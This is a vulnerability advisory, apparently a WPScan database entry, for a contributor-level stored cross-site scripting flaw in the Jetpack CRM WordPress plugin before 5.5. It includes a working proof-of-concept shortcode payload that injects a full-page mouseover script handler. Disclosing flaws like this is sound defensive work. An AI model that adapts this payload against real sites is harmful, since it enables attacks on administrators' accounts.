WordPress Plugin Vulnerabilities
Jetpack CRM < 5.5 - Contributor+ Stored XSS
Description
The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins
Proof of Concept
As a contributor, create a post/page with the following payload (a form from the plugin with id 1 must exist): [jetpackcrm_form id='1"style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//' style='simple'] The XSS will be triggered when the post/page is previewed/viewed and the mouse moved anywhere
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScan
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-19 (about 1 years ago)
Added
2022-12-19 (about 1 years ago)
Last Updated
2022-12-19 (about 1 years ago)